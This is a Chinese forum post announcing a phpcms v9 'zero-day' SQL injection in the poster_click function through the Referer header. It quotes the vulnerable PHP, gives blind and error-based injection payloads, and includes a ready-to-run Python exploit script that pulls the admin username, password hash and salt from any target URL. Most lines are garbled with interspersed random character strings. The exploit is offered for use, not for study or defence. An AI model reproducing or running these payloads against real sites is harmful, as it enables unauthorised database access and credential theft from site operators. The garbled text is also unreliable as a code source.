有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:, W9 Y0 ^5 i% x. D1 N9 c; V
- `3 ]. b. u% a7 O
问题函数\phpcms\modules\poster\index.php
9 F2 ?, C2 m/ p* Y- K, J
2 X) S$ Y1 L8 }; N" `public function poster_click() {: n, C% U( M `- i" d
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;# Q% N U' _ P0 f* S3 n1 Y
$r = $this->db->get_one(array('id'=>$id));
+ |' I, J/ |( a& x) p6 w# F) R! `if (!is_array($r) && empty($r)) return false;: G; S2 l( Q% M' V) H! [0 f
$ip_area = pc_base::load_sys_class('ip_area');6 V" |: f1 N* i8 u# ? q# ^
$ip = ip();) b# U6 x E1 w4 B+ P- y* t5 K
$area = $ip_area->get($ip);3 y& U: o) s: \/ T$ h" j
$username = param::get_cookie('username') ? param::get_cookie('username') : '';0 E L) {/ X, z
if($id) {' E, m" g& U9 q5 u* [7 L1 w2 v
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();" t: H- G6 k# S" X/ f2 V
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
x9 ~% u/ l6 Q p. x# a, ~}% u4 g% j7 _( i. [) {
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
. S# f7 ?1 r: v8 p7 G* x0 ~2 w: r$setting = string2array($r['setting']);
5 S$ R, }* Z7 J3 hif (count($setting)==1) {
V1 w, r3 d, @8 ?7 `$url = $setting['1']['linkurl'];
' H# D* p" J r2 F2 f6 I" Q/ C} else {- [) {6 Z" n5 A
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
) a5 n: [* h1 V! h1 y4 ?) a}
, m0 K8 _( w/ o9 e+ g& Theader('Location: '.$url);0 s/ s: n; ^+ Q' K) C z' t' u
}
% [1 t% Q9 H3 L8 z' R- g& j$ r, y+ M( f1 b. Y
1 H# ]/ h9 `6 F/ T3 e7 y
- L% I! Z% p' i' k* g8 B. j' x& A# q利用方式:
: B8 W# m/ ` x3 ]4 f
) F7 w9 U7 n& }1、可以采用盲注入的手法:. K7 O0 ?1 b$ \: m1 E
~8 R9 m5 X9 S6 Nreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)## q" z% K N2 i1 s2 B
4 \, M0 z! h8 y) b# z
通过返回页面,正常与否一个个猜解密码字段。
! {" k5 \3 {3 o
! L/ }1 [2 B, O2 W- K( r; q2、代码是花开写的,随手附上了:
& Z! Y8 B8 r3 }! N! Z+ E; E* |% S9 L( V0 }6 a, V, c
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
: ^2 I8 C0 O0 m# p# g. Y% d P) e% E# S
此方法是爆错注入手法,原理自查。
4 ^, u! M5 A/ V2 n, [. l/ ?* i! x
5 ?% k2 J& s. f# u: w6 d: P3 Q; m
8 V' M4 a: V2 ^2 O! F* I, k5 [6 G z1 C; l7 t! h+ y8 N i& s$ W8 D
利用程序:6 c! b# v$ ~( `7 `+ A( o
3 h- r2 j! Z" z: \#!/usr/bin/env python7 \/ `. b! x, g+ J! r1 Q
import httplib,sys,re/ n ]3 K, q) R; J% {" w9 f
, O t6 c2 P2 x" k
def attack():
. Z2 {3 N! U8 x" ?' ?3 }print “Code by Pax.Mac Team conqu3r!”8 k! Z: K) y( T! x3 v" P0 j( ~
print “Welcome to our zone!!!”
/ d* v. e" t, u+ r7 aurl=sys.argv[1]
9 k% B6 U G& O6 dpaths=sys.argv[2]
- U& ]4 \. \) }7 Dconn = httplib.HTTPConnection(url)
. I9 b) e" I: C7 j9 Q. V+ W# ai_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
7 q. Y, |8 z: E/ T“Accept”: “text/plain”,
" K- w; u4 Q) x$ E& R“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}3 `! Y: d: R2 U* r
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
0 w' i9 c- A$ s5 x7 u4 u" |r1 = conn.getresponse()$ e, j: z% l3 M: h* k* o: S
datas=r1.read()
; K. i! o C" L7 m2 jdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
. _& w0 ?& I& Z/ v7 ^# |print datas[0]
5 T1 V( C: Z9 ?; i" u% hconn.close()$ ~2 h! R f& @; }4 G) L
if __name__==”__main__”:
0 {5 |- Y- U. Z5 ?if len(sys.argv)<3:
1 D+ I* g: j/ w! lprint “Code by Pax.Mac Team conqu3r”
7 I! M/ g4 }/ jprint “Usgae:”
+ w5 E8 S7 ~& g6 Z8 I- V; pprint “ phpcmsattack.py www.paxmac.org /”
) [) L. L0 p* j- W( Dprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”- V, c' W/ d9 ]8 v" w
sys.exit(1)2 ]' H! z0 }' z; L- v
attack()! ~* |' m4 m4 V/ {
4 J5 v- K. r% q! F
|
发表于 2013-1-11 21:01:00
收藏
支持
反对